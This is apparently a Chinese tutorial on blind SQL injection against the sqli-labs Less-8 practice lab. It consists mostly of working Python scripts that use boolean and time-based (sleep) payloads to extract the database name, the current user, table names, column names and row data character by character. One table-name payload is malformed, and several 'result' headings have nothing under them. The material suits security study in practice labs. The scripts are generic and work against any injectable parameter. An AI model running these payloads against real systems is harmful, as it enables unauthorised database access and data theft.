sql盲注脚本

在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据

发现页面加载了3秒左右可以进行盲注

布尔盲注数据库名

import requests def inject_database(url): dataname='' for i in range(1,15): low = 32 high = 128 mid = (low + high) // 2 while low < high: path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid) r = requests.get(url,path) if "You are in..........." in r.text: low = mid + 1 else : high = mid mid = (low + high) // 2 if mid == 32: break dataname += chr(mid) print(dataname) if __name__=='__main__': url = 'http://127.0.0.1:8989/Less-8/' inject_database(url)

结果

用时间盲注出用户名

import requests import time def inject_user(url): user='' for i in range(1,15): low = 32 high = 128 mid = (low + high) // 2 while low < high: payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- " res = {"id":payload} start_time = time.time() r = requests.get(url,params=res) if (time.time() - start_time)>1: # 匹配成功 low = mid + 1 else : high = mid mid = (low + high) // 2 if mid == 32: break user += chr(mid) print(user) if __name__=='__main__': url = 'http://127.0.0.1:8989/Less-8/' inject_user(url)

结果

用盲注的方式查询表、列、具体数据

if __name__ == '__main__': url = 'http://127.0.0.1:8989/Less-8/' # 获取当前数据库名 database_name = inject_database(url) print(f"Database name: {database_name}") # 获取数据库中的表名 tables = inject_tables(url, database_name) print(f"Tables in database '{database_name}': {tables}") # 获取指定表中的列名 table_name = 'users' # 替换为目标表名 columns = inject_columns(url, table_name) print(f"Columns in table '{table_name}': {columns}") # 获取指定表中特定列的数据 column_name = 'username' # 替换为目标列名 data = inject_data(url, table_name, column_name) print(f"Data in column '{column_name}' of table '{table_name}': {data}")

时间检测模块

# 发送请求并检查响应时间 def check_time_injection(url, payload): res = {"id": payload} start_time = time.time() r = requests.get(url, params=res) elapsed_time = time.time() - start_time return elapsed_time > 1 # 假设延迟超过1秒表示查询成功

数据库模块

# 获取当前数据库名 def inject_database(url): dataname='' for i in range(1,15): low = 32 high = 128 mid = (low + high) // 2 while low < high: payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid) res = {"id":payload} r = requests.get(url,params=res) if "You are in..........." in r.text: low = mid + 1 else : high = mid mid = (low + high) // 2 if mid == 32: break dataname += chr(mid) print(dataname) return dataname

数据库中表名模块

# 获取指定数据库中的表名 def inject_tables(url, database_name): tables = [] table_index = 0 while True: table_index += 1 table_name = '' for i in range(1, 20): # 假设表名长度不超过20字符 low = 32 high = 128 while low < high: mid = (low + high) // 2 payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- " if check_time_injection(url, payload): low = mid + 1 else: high = mid if low == 32: # ASCII码32为空格，通常表示结束 break table_name += chr(low) print(f"Current table name: {table_name}") if table_name: tables.append(table_name) print(f"Found table: {table_name}") else: break return tables

列名模块

def inject_columns(url, table_name): columns = [] column_index = 0 while True: column_index += 1 column_name = '' for i in range(1, 20): # 假设列名长度不超过20字符 low = 32 high = 128 while low < high: mid = (low + high) // 2 payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- " if check_time_injection(url, payload): low = mid + 1 else: high = mid if low == 32: # ASCII码32为空格，通常表示结束 break column_name += chr(low) print(f"Current column name: {column_name}") if column_name: columns.append(column_name) print(f"Found column: {column_name}") else: break return columns

指定查询数据模块

# 获取指定表中特定列的数据 def inject_data(url, table_name, column_name): data = [] row_index = 0 while True: row_index += 1 row_value = '' for i in range(1, 20): # 假设数据长度不超过20字符 low = 32 high = 128 while low < high: mid = (low + high) // 2 payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- " if check_time_injection(url, payload): low = mid + 1 else: high = mid if low == 32: # ASCII码32为空格，通常表示结束 break row_value += chr(low) print(f"Current row value: {row_value}") if row_value: data.append(row_value) print(f"Found data: {row_value}") else: break return data

结果

数据库

列

user